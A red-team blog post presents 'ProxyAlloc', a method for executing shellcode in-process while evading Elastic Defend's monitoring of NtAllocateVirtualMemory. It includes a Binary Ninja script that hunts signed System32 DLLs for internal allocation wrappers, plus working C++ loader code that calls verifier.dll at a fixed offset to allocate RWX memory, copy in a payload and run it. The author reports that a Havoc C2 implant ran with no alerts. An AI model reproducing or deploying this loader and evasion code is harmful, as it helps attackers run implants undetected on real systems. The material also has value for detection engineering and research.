ProxyAlloc: evading NtAllocateVirtualMemory detection ft. Elastic Defend & Binary Ninja

In this article, we will explore a method for in-process shellcode execution evasion. This method is specifically designed to avoid the detection of NtAllocateVirtualMemory calls from unsigned DLLs.

Preface

Not long ago, one of my standard in-process shellcode execution methods for the Red Team engagements I have worked on looked similar to this:

DWORD protect{};
LPVOID virtualMemory = nullptr;
SIZE_T size = rawShellcodeLength;

this->api.NtAllocateVirtualMemory.call
(
    NtCurrentProcess(), &virtualMemory, 0, &size,
    MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE
);

this->api.RtlMoveMemory.call(virtualMemory, rawShellcode, rawShellcodeLength);

(*(int(*)()) virtualMemory)();

This method has variations, such as using additional NtProtectVirtualMemory calls to avoid allocating memory with RWX protections. Most of them should look familiar to you and usually take the following form:

PAGE_NOACCESS -> PAGE_READWRITE -> PAGE_EXECUTE_READ PAGE_READWRITE -> PAGE_EXECUTE_READ PAGE_READWRITE -> PAGE_EXECUTE

This is a well-known technique, but it is not often detected in a corporate environment where business processes prevail over security considerations (and usually, rightly so).

I was, however, surprised, when I tried to launch my implant in a new lab that has Elastic stack configured, with Elastic Defend as an agent and the most aggressive detection methods turned on.

Detection

Right when the implant was launched, I observed the following:

When I looked into the specifics of that detection, it became obvious that NtAllocateVirtualMemory / NtProtectVirtualMemory calls are being monitored:

After thinking about it for some time and related evasion discussions with @zimnyaa (I suggest checking his blog at tishina.in), an idea came to my mind.

Let us review the call stack when the NtAllocateVirtualMemory call happens:

Essentially, the call stack relevant to our objective at this point can be translated to the following:

unsigned_binary -> signed_ntdll_ZwAllocateVirtualMemory

What if we could place some signed module in between, to pretend that we are not directly calling NtAllocateVirtualMemory? It appears that we can.

Discovery

Multiple Microsoft-signed DLLs are present at C:\Windows\System32\*.

I decided to utilize Binary Ninja with its awesome Python API to scan every signed DLL there for functions that might serve as a wrapper for NtAllocateVirtualMemory.

The high-level overview of the search algorithm for any DLL is as follows:

  1. Check if NtAllocateVirtualMemory is imported by our target.

  2. If imported, check all its call sites for two separate special cases below.

  3. Mark the location if Protect and RegionSize arguments can be supplied through the caller function's parameters.

  4. Mark the location if RWX memory of more than 64KB is allocated.

The script is as follows and could be improved to account for more valid cases:

import os
import binaryninja
from binaryninja import highlevelil

# File with all signed dll paths in C:\Windows\System32\*
signed_dlls_path = r'C:\Users\user\source\repos\SignedDllAnalyzer\signed_dlls.txt'

# Counting how many dlls are to be processed
with open(signed_dlls_path, "r") as f:
    signed_dlls = [dll.strip() for dll in f]

total_dlls = len(signed_dlls)

with open(signed_dlls_path, "r") as f:
	current_dll = 0
	# Processing each dll
	for signed_dll_path in f:
		current_dll += 1
		# Preparing variables for the progress bar
		signed_dll_path = signed_dll_path.strip()
		dll_name = signed_dll_path.split('\\')[-1]
		dll_size_mb = os.path.getsize(signed_dll_path) / 1024 / 1024
		progress = f"{current_dll}/{total_dlls}"
		# We don't want to process dlls with size more than 15 MB
		if dll_size_mb > 15:
			print(f"[-] [{progress}] [{dll_name}] [{dll_size_mb:.2f} > 15 MB]")
			continue
		# Update progress bar
		print(f"[*] [{progress}] [{dll_name}] [{dll_size_mb:.2f} MB]")
		# Open the dll in Binary Ninja without advanced analysis
		with binaryninja.load(signed_dll_path, update_analysis=False) as binary_view:
			# Check if NtAllocateVirtualMemory is imported by the dll
			ntAllocateVirtualMemorySymbol = binary_view.get_symbol_by_raw_name("NtAllocateVirtualMemory")
			# If it is not imported, we skip to the next dll
			if not ntAllocateVirtualMemorySymbol:
				continue
			else:
				# If it is imported, update progress and perform dll analysis
				print(f"[+] [{progress}] [{dll_name}] [NtAllocateVirtualMemory]")
				binary_view.set_analysis_hold(False)
				binary_view.update_analysis_and_wait()
				# Get all code references of the NtAllocateVirtualMemory call and process each one
				code_refs = binary_view.get_code_refs(ntAllocateVirtualMemorySymbol.address)
				for ref in code_refs:
					try:
						# Get the function which contains target code reference
						func = binary_view.get_functions_containing(ref.address)[0]
						# Get the HLIL (High Level IL) representation of the call site
						hlil_instr = func.get_llil_at(ref.address).hlil
						# Specifically look for the NtAllocateVirtualMemory call
						for operand in hlil_instr.operands:
							if type(operand) == HighLevelILCall:
								if operand.dest.value.value == ntAllocateVirtualMemorySymbol.address:
									hlil_call = operand
									break
						# Process arguments of the NtAllocateVirtualMemory call (specifically Protect and RegionSize)
						args = hlil_call.params
						protect = args[5]
						regionSize = args[3]
						# More cases could be added here (for example, variable SSA form analysis)
						# Case 1: arguments are directly supplied from wrapper function parameters
						if type(protect) == HighLevelILVar:
							if protect.var not in func.parameter_vars:
								continue
						if type(regionSize) == HighLevelILVar:
							if regionSize.var not in func.parameter_vars:
								continue
						# Case 2: arguments are constant
						if type(protect) == HighLevelILConst:
							if int(protect.value) != 0x40: # looking for RWX
								continue
						if type(regionSize) == HighLevelILConst:
							if int(regionSize.value) <= 0x10000: # looking for more than 64 KB
								continue
						# If reached here, update the progress to sumbit finding for manual analysis
						print(f"[+] [{progress}] [{dll_name}] [{hex(ref.address)}] [{hlil_instr}]")
					except Exception as e:
						print(f"[x] [{progress}] [{dll_name}] [{e}]")

After running the script, we can observe multiple findings:

For example, both of those functions are essentially wrappers around NtAllocateVirtualMemory:

Curious readers might ask, if we consider calling them instead of NtAllocateVirtualMemory, how is this different from calling kernel32.VirtualAlloc?

Two main differences that are relevant for us:

  1. VirtualAlloc is monitored by security solutions even more than NtAllocateVirtualMemory.

  2. It is an exported API function, while both functions above are internal for verifier.dll.

Other than that, yes, it is very similar to VirtualAlloc, which itself is a wrapper around NtAllocateVirtualMemory:

The technique itself: ProxyAlloc

I decided to call this method ProxyAlloc, as we are proxying our actual call to NtAllocateVirtualMemory through any Microsoft-signed DLL that has an internal wrapper around it.

The code for this technique is as follows (example with verifier.AVrfpNtAllocateVirtualMemory):

typedef NTSTATUS (*AVrfpNtAllocateVirtualMemory_t)
(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    ULONG_PTR *RegionSize,
    ULONG AllocationType,
    ULONG Protect
);

DWORD protect{};
LPVOID virtualMemory = nullptr;
SIZE_T size = rawShellcodeLength;

HMODULE hVerifierMod = this->api.LoadLibraryA.call("verifier.dll");

AVrfpNtAllocateVirtualMemory_t AVrfpNtAllocateVirtualMemory = (AVrfpNtAllocateVirtualMemory_t)((char*)hVerifierMod + 0x25110);
AVrfpNtAllocateVirtualMemory(NtCurrentProcess(), &virtualMemory, 0, &size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

this->api.RtlMoveMemory.call(virtualMemory, rawShellcode, rawShellcodeLength);

(*(int(*)()) virtualMemory)();

It also could be improved, for example, by using pattern scanning instead of plain offsets.

The call stack observed after using this method is:

Which roughly equals to the following scheme, as expected:

unsigned_binary -> signed_dll_offset -> signed_ntdll_ZwAllocateVirtualMemory

Final Test

After testing this with an actual loader and modified Havoc (Demon agent shellcode) as our C2 of choice, Elastic Defend did not generate any alerts.

Last updated